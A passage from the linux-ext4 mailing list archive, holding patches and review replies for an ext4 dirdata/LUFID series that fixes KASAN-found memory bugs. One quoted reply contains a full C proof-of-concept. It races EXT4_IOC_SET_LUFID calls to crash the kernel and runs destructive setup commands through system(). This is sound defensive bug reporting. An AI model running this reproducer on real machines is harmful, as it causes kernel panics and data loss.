+ * Returns true if @de is a directory block tail entry (checksum record).
+ */
+static inline bool ext4_dir_entry_is_tail(struct ext4_dir_entry_2 *de)
+{
+ struct ext4_dir_entry_tail *t = (struct ext4_dir_entry_tail *)de;
+
+ return !t->det_reserved_zero1 &&
+ le16_to_cpu(t->det_rec_len) == sizeof(*t) &&
+ !t->det_reserved_zero2 &&
+ t->det_reserved_ft == EXT4_FT_DIR_CSUM;
+}
+
extern const struct iomap_ops ext4_iomap_ops;
extern const struct iomap_ops ext4_iomap_report_ops;
diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
index c2f330c75c81..2fc14332fab7 100644
--- a/fs/ext4/namei.c
+++ b/fs/ext4/namei.c
@@ -314,7 +314,6 @@ static struct ext4_dir_entry_tail *get_dirent_tail(struct inode *inode,
struct buffer_head *bh)
{
struct ext4_dir_entry_tail *t;
- int blocksize = EXT4_BLOCK_SIZE(inode->i_sb);
#ifdef PARANOID
struct ext4_dir_entry_2 *d, *top;
@@ -334,11 +333,7 @@ static struct ext4_dir_entry_tail *get_dirent_tail(struct inode *inode,
t = EXT4_DIRENT_TAIL(bh->b_data, EXT4_BLOCK_SIZE(inode->i_sb));
#endif
- if (t->det_reserved_zero1 ||
- (ext4_rec_len_from_disk(t->det_rec_len, blocksize) !=
- sizeof(struct ext4_dir_entry_tail)) ||
- t->det_reserved_zero2 ||
- t->det_reserved_ft != EXT4_FT_DIR_CSUM)
+ if (!ext4_dir_entry_is_tail((struct ext4_dir_entry_2 *)t))
return NULL;
return t;
--
2.43.7
^ permalink raw reply related
* [PATCH v4 02/11] ext4: replace ext4_dir_entry with ext4_dir_entry_2
From: Artem Blagodarenko @ 2026-06-24 13:36 UTC (permalink / raw)
To: linux-ext4; +Cc: adilger.kernel, Artem Blagodarenko, Andreas Dilger
In-Reply-To: <20260624133642.18438-1-ablagodarenko@thelustrecollective.com>
From: Artem Blagodarenko <artem.blagodarenko@gmail.com>
Replace remaining uses of struct ext4_dir_entry in namei.c
with struct ext4_dir_entry_2.
The code paths affected by this change already depend on the
filetype feature, so using struct ext4_dir_entry_2 is
appropriate and avoids mixing the two directory entry types
unnecessarily.
This change does not affect support for 16-bit rec_len.
Signed-off-by: Artem Blagodarenko <artem.blagodarenko@gmail.com>
Reviewed-by: Andreas Dilger <adilger@dilger.ca>
---
fs/ext4/namei.c | 38 +++++++++++++++++++-------------------
1 file changed, 19 insertions(+), 19 deletions(-)
diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
index a283e285937a..c2f330c75c81 100644
--- a/fs/ext4/namei.c
+++ b/fs/ext4/namei.c
@@ -102,7 +102,7 @@ static struct buffer_head *ext4_append(handle_t *handle,
}
static int ext4_dx_csum_verify(struct inode *inode,
- struct ext4_dir_entry *dirent);
+ struct ext4_dir_entry_2 *dirent);
/*
* Hints to ext4_read_dirblock regarding whether we expect a directory
@@ -128,7 +128,7 @@ static struct buffer_head *__ext4_read_dirblock(struct inode *inode,
unsigned int line)
{
struct buffer_head *bh;
- struct ext4_dir_entry *dirent;
+ struct ext4_dir_entry_2 *dirent;
int is_dx_block = 0;
if (block >= inode->i_size >> inode->i_blkbits) {
@@ -160,7 +160,7 @@ static struct buffer_head *__ext4_read_dirblock(struct inode *inode,
}
if (!bh)
return NULL;
- dirent = (struct ext4_dir_entry *) bh->b_data;
+ dirent = (struct ext4_dir_entry_2 *) bh->b_data;
/* Determine whether or not we have an index block */
if (is_dx(inode)) {
if (block == 0)
@@ -317,13 +317,13 @@ static struct ext4_dir_entry_tail *get_dirent_tail(struct inode *inode,
int blocksize = EXT4_BLOCK_SIZE(inode->i_sb);
#ifdef PARANOID
- struct ext4_dir_entry *d, *top;
+ struct ext4_dir_entry_2 *d, *top;
- d = (struct ext4_dir_entry *)bh->b_data;
- top = (struct ext4_dir_entry *)(bh->b_data +
+ d = (struct ext4_dir_entry_2 *)bh->b_data;
+ top = (struct ext4_dir_entry_2 *)(bh->b_data +
(blocksize - sizeof(struct ext4_dir_entry_tail)));
while (d < top && ext4_rec_len_from_disk(d->rec_len, blocksize))
- d = (struct ext4_dir_entry *)(((void *)d) +
+ d = (struct ext4_dir_entry_2 *)(((void *)d) +
ext4_rec_len_from_disk(d->rec_len, blocksize));
if (d != top)
@@ -410,22 +410,22 @@ int ext4_handle_dirty_dirblock(handle_t *handle,
}
static struct dx_countlimit *get_dx_countlimit(struct inode *inode,
- struct ext4_dir_entry *dirent,
+ struct ext4_dir_entry_2 *dirent,
int *offset)
{
- struct ext4_dir_entry *dp;
+ struct ext4_dir_entry_2 *de;
struct dx_root_info *root;
int count_offset;
int blocksize = EXT4_BLOCK_SIZE(inode->i_sb);
unsigned int rlen = ext4_rec_len_from_disk(dirent->rec_len, blocksize);
if (rlen == blocksize)
- count_offset = 8;
+ count_offset = sizeof(struct dx_node);
else if (rlen == 12) {
- dp = (struct ext4_dir_entry *)(((void *)dirent) + 12);
- if (ext4_rec_len_from_disk(dp->rec_len, blocksize) != blocksize - 12)
+ de = (struct ext4_dir_entry_2 *)(((void *)dirent) + 12);
+ if (ext4_rec_len_from_disk(de->rec_len, blocksize) != blocksize - 12)
return NULL;
- root = (struct dx_root_info *)(((void *)dp + 12));
+ root = (struct dx_root_info *)(((void *)de + 12));
if (root->reserved_zero ||
root->info_length != sizeof(struct dx_root_info))
return NULL;
@@ -438,7 +438,7 @@ static struct dx_countlimit *get_dx_countlimit(struct inode *inode,
return (struct dx_countlimit *)(((void *)dirent) + count_offset);
}
-static __le32 ext4_dx_csum(struct inode *inode, struct ext4_dir_entry *dirent,
+static __le32 ext4_dx_csum(struct inode *inode, struct ext4_dir_entry_2 *dirent,
int count_offset, int count, struct dx_tail *t)
{
struct ext4_inode_info *ei = EXT4_I(inode);
@@ -456,7 +456,7 @@ static __le32 ext4_dx_csum(struct inode *inode, struct ext4_dir_entry *dirent,
}
static int ext4_dx_csum_verify(struct inode *inode,
- struct ext4_dir_entry *dirent)
+ struct ext4_dir_entry_2 *dirent)
{
struct dx_countlimit *c;
struct dx_tail *t;
@@ -489,7 +489,7 @@ static int ext4_dx_csum_verify(struct inode *inode,
return 1;
}
-static void ext4_dx_csum_set(struct inode *inode, struct ext4_dir_entry *dirent)
+static void ext4_dx_csum_set(struct inode *inode, struct ext4_dir_entry_2 *dirent)
{
struct dx_countlimit *c;
struct dx_tail *t;
@@ -523,7 +523,7 @@ static inline int ext4_handle_dirty_dx_node(handle_t *handle,
struct inode *inode,
struct buffer_head *bh)
{
- ext4_dx_csum_set(inode, (struct ext4_dir_entry *)bh->b_data);
+ ext4_dx_csum_set(inode, (struct ext4_dir_entry_2 *)bh->b_data);
return ext4_handle_dirty_metadata(handle, inode, bh);
}
@@ -1496,7 +1496,7 @@ int ext4_search_dir(struct buffer_head *bh, char *search_buf, int buf_size,
}
static int is_dx_internal_node(struct inode *dir, ext4_lblk_t block,
- struct ext4_dir_entry *de)
+ struct ext4_dir_entry_2 *de)
{
struct super_block *sb = dir->i_sb;
@@ -1627,7 +1627,7 @@ static struct buffer_head *__ext4_find_entry(struct inode *dir,
}
if (!buffer_verified(bh) &&
!is_dx_internal_node(dir, block,
- (struct ext4_dir_entry *)bh->b_data) &&
+ (struct ext4_dir_entry_2 *)bh->b_data) &&
!ext4_dirblock_csum_verify(dir, bh)) {
EXT4_ERROR_INODE_ERR(dir, EFSBADCRC,
"checksumming directory "
--
2.43.7
^ permalink raw reply related
* [PATCH v4 01/11] ext4: validate count against limit in ext4_dx_csum_verify/_set
From: Artem Blagodarenko @ 2026-06-24 13:36 UTC (permalink / raw)
To: linux-ext4
Cc: adilger.kernel, Artem Blagodarenko, xiaowu.417,
Artem Blagodarenko
In-Reply-To: <20260624133642.18438-1-ablagodarenko@thelustrecollective.com>
dx_countlimit's count field was read from disk and used directly to
compute the checksummed range (count_offset + count * sizeof(dx_entry))
without ever being checked against limit -- only limit itself was
bounds-checked against the block size. A corrupted or maliciously
crafted filesystem image that sets count to a large value (e.g. 65535)
makes ext4_chksum() read far past the end of the directory block
buffer, hitting adjacent slab objects.
Reported-by: xiaowu.417@qq.com
Signed-off-by: Artem Blagodarenko <artem.blagodarenko@gmail.com>
---
fs/ext4/namei.c | 8 ++++++++
1 file changed, 8 insertions(+)
diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
index cc49ae04a6f6..a283e285937a 100644
--- a/fs/ext4/namei.c
+++ b/fs/ext4/namei.c
@@ -477,6 +477,10 @@ static int ext4_dx_csum_verify(struct inode *inode,
warn_no_space_for_csum(inode);
return 0;
}
+ if (count > limit) {
+ EXT4_ERROR_INODE(inode, "dir seems corrupt? Run e2fsck -D.");
+ return 0;
+ }
t = (struct dx_tail *)(((struct dx_entry *)c) + limit);
if (t->dt_checksum != ext4_dx_csum(inode, dirent, count_offset,
@@ -506,6 +510,10 @@ static void ext4_dx_csum_set(struct inode *inode, struct ext4_dir_entry *dirent)
warn_no_space_for_csum(inode);
return;
}
+ if (count > limit) {
+ EXT4_ERROR_INODE(inode, "dir seems corrupt? Run e2fsck -D.");
+ return;
+ }
t = (struct dx_tail *)(((struct dx_entry *)c) + limit);
t->dt_checksum = ext4_dx_csum(inode, dirent, count_offset, count, t);
--
2.43.7
^ permalink raw reply related
* [PATCH v4 00/11] Data in direntry (dirdata) feature
From: Artem Blagodarenko @ 2026-06-24 13:36 UTC (permalink / raw)
To: linux-ext4; +Cc: adilger.kernel, Artem Blagodarenko
EXT4 currently stores a hash in the directory entry
(dirent) immediately after the file name to support
simultaneous fscrypt and casefold functionality.
It has been discussed within the EXT4 community that
this hash could instead be stored in dirdata. This
would make it the second (or third, in the case of
64-bit inode counts) user of dirdata.
At the same time, the existing format—where the hash
is placed after the file name—must continue to be
supported. With these patches, EXT4 can handle the
hash in both formats.
The first user of this feature is LUFID -
Locally Unique File ID.
Support for fscrypt and case-insensitive directories
with dirdata enabled has been verified using a
dedicated xfstest submitted to the xfstests list as
a separate patch.
e2fsprogs support is provided in a separate patch
series.
Changes in v4:
- syzbot ci actually ran the v3 series and found real,
reproducible KASAN slab-out-of-bounds and use-after-free
reads, all rooted in ext4_dir_entry_len() decoding
de->rec_len with a hardcoded full-block size even when
the entry lives in a smaller buffer (inline directory
data). Gave it an explicit blocksize parameter and fixed
every caller to pass the real containing-buffer size.
- dx_get_dx_info() and get_dx_countlimit() additionally
needed dir=NULL (not just the right blocksize) when
computing past the on-disk '.'/'..' entries, since those
never carry the casefold+fscrypt hash regardless of the
directory's feature flags; passing the real dir made
ext4_dirent_rec_len() add 8 bytes of hash space that was
never written on disk, corrupting dx_root_info's offset
for every casefold+encrypt directory.
- ext4_dirdata_get()/ext4_dirdata_set(): fixed bounds checks
that were off by EXT4_BASE_DIR_LEN (the 8-byte dirent
header), a LUFID memcpy that used the wrong source/length,
an out-of-bounds array write for maximum-length filenames,
and an uninitialized gap byte leaking a stale memory byte
to disk.
- EXT4_IOC_SET_LUFID: fixed ddh_length under-counting the
header byte (silently dropping the last byte of every
LUFID payload), rejected '.'/'..' as targets, added a
missing inode_permission(dir, MAY_WRITE) check, and closed
a data race on the shared i_dirdata field by also locking
the target inode (not just the parent directory) for the
duration it's used.
- Fixed a missing bounds check in ext4_dx_csum_verify()/
ext4_dx_csum_set() that let an unvalidated on-disk `count`
field drive an out-of-bounds checksum read. This bug
predates this series, but is included as patch 1 (ahead
of the patch that touches this function) since it was
found via review of this series.
- Thanks to Sashiko AI review and to Xiao (xiaowu.417@qq.com)
for reproducing several of the above with concrete crash
logs and PoCs.
Artem Blagodarenko (11):
ext4: validate count against limit in ext4_dx_csum_verify/_set
ext4: replace ext4_dir_entry with ext4_dir_entry_2
ext4: add ext4_dir_entry_is_tail()
ext4: refactor dx_root to support variable dirent sizes
ext4: add dirdata format definitions and access helpers
ext4: preserve dirdata bits in get_dtype()
ext4: add ext4_dir_entry_len() and harden dirdata parsing
ext4: rename ext4_dir_rec_len() and clarify dirdata usage
ext4: dirdata feature
ext4: add dirdata set/get helpers
ext4: Add EXT4_IOC_SET_LUFID ioctl for setting LUFID on directory
entries
foofile.txt | 0
fs/ext4/dir.c | 9 +-
fs/ext4/ext4.h | 211 +++++++++++-
fs/ext4/inline.c | 41 ++-
fs/ext4/ioctl.c | 84 +++++
fs/ext4/namei.c | 699 +++++++++++++++++++++++++++++---------
fs/ext4/sysfs.c | 2 +
include/uapi/linux/ext4.h | 13 +
8 files changed, 861 insertions(+), 198 deletions(-)
create mode 100644 foofile.txt
--
2.43.7
^ permalink raw reply
* Re: [PATCH] ext4: cancel dirty accounting for folios without buffers
From: Zhang Yi @ 2026-06-24 13:29 UTC (permalink / raw)
To: Jan Kara, Zhu Jia
Cc: Zhang Yi, tytso, adilger.kernel, libaokun, ojaswin, ritesh.list,
linux-ext4, linux-kernel, stable
In-Reply-To: <x3jm3mhgsr7zx4hvfgdvmwoqyz5vxx2fjyxy6gs6him46767f6@dkkirnw54x6x>
On 6/24/2026 8:32 PM, Jan Kara wrote:
> On Wed 24-06-26 17:52:06, Zhu Jia wrote:
>> Hi Yi,
>>
>> Thanks for taking a look.
>>
>> Yes, clearing PAGECACHE_TAG_DIRTY/TOWRITE would make the page-cache state
>> cleaner. I had a version that did this by adding a helper around
>> folio_cancel_dirty() and clearing the xarray tags after confirming the
>> folio was still the same clean page-cache entry.
>>
>> It looked like this:
>>
>> static void ext4_cancel_dirty_folio(struct address_space *mapping,
>> struct folio *folio)
>> {
>> XA_STATE(xas, &mapping->i_pages, folio->index);
>> unsigned long flags;
>>
>> folio_cancel_dirty(folio);
>>
>> xas_lock_irqsave(&xas, flags);
>> if (xas_load(&xas) == folio && !folio_test_dirty(folio)) {
>> xas_clear_mark(&xas, PAGECACHE_TAG_DIRTY);
>> xas_clear_mark(&xas, PAGECACHE_TAG_TOWRITE);
>> }
>> xas_unlock_irqrestore(&xas, flags);
>> }
>>
>> The reason I left the tags unchanged in this version is that I was not sure
>> whether it is appropriate for ext4 to open-code xarray tag cleanup directly.
>>
>> If you think this is the right direction, I can add the helper back and
>> send a v2.
>
> That was a good judgement! Playing with xarray tags like this in filesystem
> code is certainly not a good thing. For now, I'd leave the xarray tags
> dangling - they will be eventually synced with reality on next writeback
> attempt. If this inconsistency of tags needs to be fixed, the fix belongs
> to the generic code (so that it can be used in other places as well).
>
> Honza
Yes, I agree. Directly clearing the tag via open code is not a good
approach. However, I took a look at the !nr_to_submit branch in
ext4_bio_write_folio(), and it seems to have a similar simple handling
pattern—it directly calls __folio_start_writeback() and
folio_end_writeback(), which appears to be an elegant way to clear them.
Could we also call these two helpers just after folio_cancel_dirty()
here?
Thanks,
Yi.
^ permalink raw reply
* Re: [PATCH v2] ext4: fix ABBA deadlock in ext4_xattr_inode_cache_find()
From: Jan Kara @ 2026-06-24 13:13 UTC (permalink / raw)
To: Aditya Srivastava
Cc: tytso, jack, adilger.kernel, libaokun, ritesh.list, yi.zhang,
linux-ext4, linux-kernel, Colin Ian King
In-Reply-To: <20260623095911.2372-1-aditya.ansh182@gmail.com>
On Tue 23-06-26 09:59:11, Aditya Srivastava wrote:
> From: Aditya Prakash Srivastava <aditya.ansh182@gmail.com>
>
> Syzbot/stress-ng reported an ABBA deadlock in ext4 when exercising
> concurrent xattr workloads (using the ea_inode mount/format option).
>
> The deadlock occurs between the running transaction and the eviction
> thread:
> - Task 1 (stress-ng): Holds a reference to a shared mbcache_entry (ce)
> and calls ext4_xattr_inode_cache_find() -> ext4_iget() to retrieve
> the corresponding EA inode. Since the EA inode is currently being
> evicted, ext4_iget() blocks in __wait_on_freeing_inode() waiting for
> eviction to complete.
> - Task 2 (eviction thread): Currently evicting the same EA inode in
> ext4_evict_ea_inode(). It calls mb_cache_entry_wait_unused(oe) which
> blocks waiting for Task 1 to release the reference to the mbcache_entry.
>
> To break this deadlock, perform a non-blocking lookup of the EA inode
> using VFS's find_inode_nowait() API. If the EA inode is currently being
> evicted (marked with I_FREEING or I_WILL_FREE), simply skip it (treat
> as a cache miss) rather than waiting for eviction to complete. If the
> returned inode is found to be I_NEW, wait for its initialization to
> clear using wait_on_new_inode().
>
> This deadlock was made much easier to hit after commit 0a46ef234756
> ("ext4: do not create EA inode under buffer lock") which removed
> synchronization on the buffer lock.
>
> Reported-by: Colin Ian King <colin.i.king@gmail.com>
> Closes: https://bugzilla.kernel.org/show_bug.cgi?id=219283
> Fixes: 0a46ef234756 ("ext4: do not create EA inode under buffer lock")
> Signed-off-by: Aditya Prakash Srivastava <aditya.ansh182@gmail.com>
I was looking into this for quite some time in the past and then ran out of
time when redesigning locking of the xattrs (which is a mess). Your
solution is a bit hacky but as a quick stability fix before we can rework
xattr locking it actually looks like a neat idea!
> diff --git a/fs/ext4/xattr.c b/fs/ext4/xattr.c
> index 982a1f831e22..ef13e7a76153 100644
> --- a/fs/ext4/xattr.c
> +++ b/fs/ext4/xattr.c
> @@ -1523,6 +1523,20 @@ static struct inode *ext4_xattr_inode_create(handle_t *handle,
> return ea_inode;
> }
>
> +static int ext4_xattr_inode_match(struct inode *inode, u64 ino, void *data)
> +{
> + if (inode->i_ino != ino)
> + return 0;
> + spin_lock(&inode->i_lock);
> + if (inode_state_read(inode) & (I_FREEING | I_WILL_FREE)) {
> + spin_unlock(&inode->i_lock);
> + return 0;
> + }
I think you should also skip I_CREATING inodes here... I don't think you
can really spot them here, but just so that we don't have to worry.
> + __iget(inode);
> + spin_unlock(&inode->i_lock);
> + return 1;
> +}
> +
> static struct inode *
> ext4_xattr_inode_cache_find(struct inode *inode, const void *value,
> size_t value_len, u32 hash)
> @@ -1549,10 +1563,19 @@ ext4_xattr_inode_cache_find(struct inode *inode, const void *value,
> }
>
> while (ce) {
> - ea_inode = ext4_iget(inode->i_sb, ce->e_value,
> - EXT4_IGET_EA_INODE);
> - if (IS_ERR(ea_inode))
> + ea_inode = find_inode_nowait(inode->i_sb, ce->e_value,
> + ext4_xattr_inode_match, NULL);
> + if (!ea_inode)
> goto next_entry;
> + if (inode_state_read_once(ea_inode) & I_NEW)
> + wait_on_new_inode(ea_inode);
> + if (is_bad_inode(ea_inode) ||
> + !(EXT4_I(ea_inode)->i_flags & EXT4_EA_INODE_FL) ||
> + ext4_test_inode_state(ea_inode, EXT4_STATE_XATTR) ||
> + EXT4_I(ea_inode)->i_file_acl) {
> + iput(ea_inode);
> + goto next_entry;
> + }
So instead of open-coding these checks here, I'd rather implement an
EXT4_IGET_NOWAIT flag which will use find_inode_nowait() like above for the
inode lookup; then you don't have to open-code the sanity checks here and
they can stay contained in the ext4_iget() code...
Honza
--
Jan Kara <jack@suse.com>
SUSE Labs, CR
^ permalink raw reply
* Re: [PATCH] ext4: cancel dirty accounting for folios without buffers
From: Zhu Jia @ 2026-06-24 13:10 UTC (permalink / raw)
To: Jan Kara
Cc: Zhu Jia, Zhang Yi, Theodore Ts'o, Andreas Dilger, Baokun Li,
Ojaswin Mujoo, Ritesh Harjani, linux-ext4, linux-kernel, stable
In-Reply-To: <x3jm3mhgsr7zx4hvfgdvmwoqyz5vxx2fjyxy6gs6him46767f6@dkkirnw54x6x>
On Wed, Jun 24, 2026 at 02:32:27PM +0200, Jan Kara wrote:
> On Wed 24-06-26 17:52:06, Zhu Jia wrote:
> > The reason I left the tags unchanged in this version is that I was not sure
> > whether it is appropriate for ext4 to open-code xarray tag cleanup directly.
> >
> > If you think this is the right direction, I can add the helper back and
> > send a v2.
>
> That was a good judgement! Playing with xarray tags like this in filesystem
> code is certainly not a good thing. For now, I'd leave the xarray tags
> dangling - they will be eventually synced with reality on next writeback
> attempt. If this inconsistency of tags needs to be fixed, the fix belongs
> to the generic code (so that it can be used in other places as well).
>
> Honza
Thanks, makes sense. I'll keep the fix as-is and leave the xarray tags
alone.
Thanks,
Jia
^ permalink raw reply
* Re: [PATCH v3 10/10] ext4: Add EXT4_IOC_SET_LUFID ioctl for setting LUFID on directory entries
From: Artem Blagodarenko @ 2026-06-24 12:33 UTC (permalink / raw)
To: XIAO WU; +Cc: linux-ext4, adilger.kernel, Andreas Dilger
In-Reply-To: <tencent_2D1051E0281A7550C4CA60798593BF905B09@qq.com>
Hi Xiao,
Thanks for the detailed reproducer and analysis of the race condition on
EXT4_I(inode)->i_dirdata, and for the additional issues you flagged from
the same Sashiko AI review. I've confirmed all of them by reading the
code directly and fixed each one:
- ddh_length was missing the header's own length (only esl_data_len was
used), which silently dropped the last byte of every LUFID payload set
through this ioctl. Fixed to include the header size, and tightened the
esl_data_len upper bound so the result can't wrap the __u8 field.
- '.' and '..' are now rejected -- they must stay the fixed first two
entries of the directory's first block, and can't go through this
ioctl's general delete+re-add path.
- The handler now checks inode_permission(dir, MAY_WRITE) before
proceeding, instead of relying only on mnt_want_write_file().
- ext4_dirdata_set_lufid() now also locks the target inode (nested under
the parent directory, consistently dir-then-inode) for the
i_dirdata set/use/restore window, closing the race you reproduced
between concurrent calls on different hardlinks of the same inode.
All four fixes will be included in the next version of this series.
Thanks again for the thorough reproducers -- they were a big help in
pinning down the root causes.
Artem
On Mon, 22 Jun 2026 at 18:21, XIAO WU <xiaowu.417@qq.com> wrote:
>
> Hi Artem,
>
> I came across the Sashiko AI review [1] of this patch and was able to
> reproduce a kernel crash triggered by a race condition in
> ext4_dirdata_set_lufid(). I wanted to share the evidence in case it's
> helpful.
>
> The core issue is that EXT4_I(inode)->i_dirdata is set to a
> stack-local pointer without locking the target inode:
>
> > +static int ext4_dirdata_set_lufid(struct inode *dir,
> > + const char *name, int namelen,
> > + struct ext4_dentry_param *edp)
> > +{
> > ...
> > + EXT4_I(inode)->i_dirdata = edp;
>
> The function locks the parent directory (inode_lock(dir)), but does NOT
> lock the target inode. If two threads operate on different hardlinks
> to the *same* inode (in different directories), they race to overwrite
> inode->i_dirdata with each other's stack-local edp pointers. The
> winner's stack pointer is later consumed through ext4_add_entry() →
> ext4_lookup() → ext4_dentry_get_fid(), reading from a stale or
> overwritten stack frame.
>
> With KASAN enabled this manifests as a null-ptr-deref because KASAN
> poisons freed stack memory.
>
> [Reproduction]
>
> The PoC creates two subdirectories (/mnt/test/da and /mnt/test/db),
> hardlinks the same file into both, then runs 8 child processes that
> hammer EXT4_IOC_SET_LUFID on the two directories simultaneously via
> ioctl(). Each child is pinned to a specific CPU to maximize the race
> window. The kernel panics within a few seconds.
>
> [Crash log — kernel 7.1.0-next-20260618, CONFIG_KASAN=y, SMP]
>
> Oops: general protection fault, probably for non-canonical address
> 0xdffffc0000000000: 0000 [#1] SMP KASAN NOPTI
> KASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007]
>
> RIP: 0010:ext4_dirdata_set_lufid+0x3e8/0xb00
> RAX: dffffc0000000000 RBX: 0000000000000000
> ...
> Call Trace:
> <TASK>
> ext4_ioctl_set_lufid+0x2d9/0x350
> __ext4_ioctl+0x1d2/0x43c0
> __x64_sys_ioctl+0x193/0x210
> do_syscall_64+0x129/0x850
> entry_SYSCALL_64_after_hwframe+0x77/0x7f
> </TASK>
>
> The same crash was independently hit by a second thread at [#2],
> confirming the race condition.
>
> Additionally, the Sashiko review [1] noted a few other issues in this
> patch that may be worth checking:
>
> - The ioctl does not reject '.' and '..' — modifying these special
> entries via EXT4_IOC_SET_LUFID would corrupt the directory layout.
>
> - The ddh_length computation in ext4_find_dest_de() appears to
> exclude the header size (1 byte), which can cause the header and
> data insertion to overflow by one byte into the adjacent directory
> entry when (fname_len + esl_data_len) % 4 == 0.
>
> - The handler calls mnt_want_write_file() but omits an explicit
> inode_permission(dir, MAY_WRITE) check, which may allow an
> unprivileged user with read-only access to the directory to
> modify directory entries.
>
> The PoC is attached below. It compiles with:
>
> gcc -o poc poc.c -static
>
> [1]
> https://sashiko.dev/#/patchset/20260619191022.27008-1-ablagodarenko%40thelustrecollective.com
> (Sashiko AI code review — "Dangling Pointer", Severity: Critical)
>
> Thanks,
> XIAO
>
> // PoC: race on EXT4_I(inode)->i_dirdata via EXT4_IOC_SET_LUFID
> #define _GNU_SOURCE
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <unistd.h>
> #include <stdint.h>
> #include <sys/types.h>
> #include <sys/stat.h>
> #include <sys/ioctl.h>
> #include <sys/mount.h>
> #include <sys/wait.h>
> #include <fcntl.h>
> #include <errno.h>
> #include <sched.h>
> #include <linux/loop.h>
> #include <linux/fs.h>
>
> struct ext4_set_lufid {
> uint8_t esl_name_len;
> char esl_name[256];
> uint8_t esl_data_len;
> char esl_data[255];
> };
> #define EXT4_IOC_SET_LUFID _IOW('f', 47, struct ext4_set_lufid)
> #define MNT "/mnt/test"
>
> int main(void)
> {
> int fd, ret;
>
> setvbuf(stdout, NULL, _IONBF, 0);
> printf("=== EXT4_IOC_SET_LUFID PoC ===\n\n");
>
> /* Setup loopback ext4 filesystem */
> system("umount -l /mnt/test 2>/dev/null; losetup -d /dev/loop0 2>/dev/null; true");
> system("rm -rf /mnt/test /tmp/img 2>/dev/null");
> mkdir(MNT, 0755);
> system("dd if=/dev/zero of=/tmp/img bs=1M count=64 2>/dev/null");
> system("losetup /dev/loop0 /tmp/img 2>/dev/null");
> system("mkfs.ext4 -F -b 1024 -O ^metadata_csum,^64bit,^flex_bg /dev/loop0 2>/dev/null");
> if (mount("/dev/loop0", MNT, "ext4", 0, NULL) != 0) {
> printf("Mount failed\n"); return 1;
> }
>
> /* Create target file with two hardlinks in different directories */
> mkdir(MNT "/da", 0755);
> mkdir(MNT "/db", 0755);
> close(open(MNT "/t", O_CREAT|O_WRONLY, 0644));
> link(MNT "/t", MNT "/da/t");
> link(MNT "/t", MNT "/db/t");
>
> printf("Racing EXT4_IOC_SET_LUFID on hardlinks...\n");
> for (int r = 0; r < 20; r++) {
> pid_t kids[8];
> for (int i = 0; i < 8; i++) {
> kids[i] = fork();
> if (kids[i] == 0) {
> /* Half target /da, half target /db — same inode */
> const char *dir = (i < 4) ? MNT "/da" : MNT "/db";
> cpu_set_t cpuset;
> CPU_ZERO(&cpuset);
> CPU_SET(i % 2, &cpuset);
> sched_setaffinity(0, sizeof(cpu_set_t), &cpuset);
>
> for (int j = 0; j < 5000; j++) {
> struct ext4_set_lufid l = {0};
> l.esl_name_len = 2;
> memcpy(l.esl_name, "t\0", 2);
> l.esl_data_len = 5;
> memcpy(l.esl_data, "ABCDE", 5);
> int f = open(dir, O_RDONLY);
> if (f >= 0) {
> ioctl(f, EXT4_IOC_SET_LUFID, &l);
> close(f);
> }
> }
> _exit(0);
> }
> }
> for (int i = 0; i < 8; i++) {
> int ws;
> waitpid(kids[i], &ws, 0);
> }
> printf("."); fflush(stdout);
> }
> printf("\n");
>
> printf("\n=== dmesg ===\n"); fflush(stdout);
> system("dmesg | grep -iE 'KASAN|BUG:|Call Trace|general protection' | tail -40");
>
> umount(MNT);
> system("losetup -d /dev/loop0 2>/dev/null");
> printf("Done.\n");
> return 0;
> }
>
^ permalink raw reply
* Re: [PATCH] ext4: cancel dirty accounting for folios without buffers
From: Jan Kara @ 2026-06-24 12:32 UTC (permalink / raw)
To: Zhu Jia
Cc: tytso, adilger.kernel, libaokun, jack, ojaswin, ritesh.list,
yi.zhang, linux-ext4, linux-kernel, stable
In-Reply-To: <20260623094947.7853-1-zhujia.zj@bytedance.com>
On Tue 23-06-26 17:49:47, Zhu Jia wrote:
> Since commit cc5095747edf ("ext4: don't BUG if someone dirty pages
> without asking ext4 first"), mpage_prepare_extent_to_map() handles dirty
> folios without buffer heads by warning, clearing PG_dirty, and skipping
> them. ext4 cannot write these folios because there are no buffer heads to
> map and submit.
>
> That recovery leaves dirty accounting behind: folio_clear_dirty() clears
> PG_dirty but does not undo the accounting charged when the folio was
> dirtied. We have seen this in production as Dirty/nr_dirty staying high
> while Writeback/nr_writeback and device write IO stayed near zero, with
> many writer tasks blocked in balance_dirty_pages() throttling. Thus the
> warning-and-skip recovery can still become a dirty-throttle DoS.
>
> Use folio_cancel_dirty() so dropping PG_dirty also cancels the dirty
> accounting.
>
> Fixes: cc5095747edf ("ext4: don't BUG if someone dirty pages without asking ext4 first")
> Cc: stable@vger.kernel.org
> Signed-off-by: Zhu Jia <zhujia.zj@bytedance.com>
Good point. Feel free to add:
Reviewed-by: Jan Kara <jack@suse.cz>
Honza
> ---
> fs/ext4/inode.c | 8 +++++++-
> 1 file changed, 7 insertions(+), 1 deletion(-)
>
> diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
> index c2c2d6ac7f3d1..7ea280e70c06e 100644
> --- a/fs/ext4/inode.c
> +++ b/fs/ext4/inode.c
> @@ -2715,7 +2715,13 @@ static int mpage_prepare_extent_to_map(struct mpage_da_data *mpd)
> */
> if (!folio_buffers(folio)) {
> ext4_warning_inode(mpd->inode, "page %lu does not have buffers attached", folio->index);
> - folio_clear_dirty(folio);
> + /*
> + * folio_cancel_dirty() pairs the dropped dirty
> + * state with dirty accounting, but leaves stale
> + * PAGECACHE_TAG_DIRTY/TOWRITE tags behind. Later
> + * writeback may rescan this clean folio.
> + */
> + folio_cancel_dirty(folio);
> folio_unlock(folio);
> continue;
> }
> --
> 2.20.1
--
Jan Kara <jack@suse.com>
SUSE Labs, CR
^ permalink raw reply
* Re: [PATCH v3 01/10] ext4: replace ext4_dir_entry with ext4_dir_entry_2
From: Artem Blagodarenko @ 2026-06-24 12:32 UTC (permalink / raw)
To: XIAO WU; +Cc: linux-ext4, adilger.kernel, Andreas Dilger
In-Reply-To: <tencent_23A0889489F22224F3214F20C2C091373E0A@qq.com>
Hi Xiao,
Thanks for taking the time to verify the Sashiko AI finding and provide a
concrete reproducer and crash log for the missing count-vs-limit check in
ext4_dx_csum_verify()/ext4_dx_csum_set(). You're right that this is a real
bug, independent of this series (it's unmodified upstream logic; this patch
only changed a parameter's type there).
I've added a fix that validates count against limit before it's used to
